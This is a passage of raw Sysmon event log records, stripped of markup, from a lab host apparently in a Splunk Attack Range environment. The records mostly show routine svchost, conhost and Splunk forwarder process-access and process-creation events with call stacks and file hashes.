Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.924{08A6967A-49C3-6000-8405-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.001{08A6967A-49C2-6000-8305-000000009A01}55805596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:42.408{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:57.205{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:00.534{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:10.924{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:15.940{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FB-6000-8605-000000009A01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 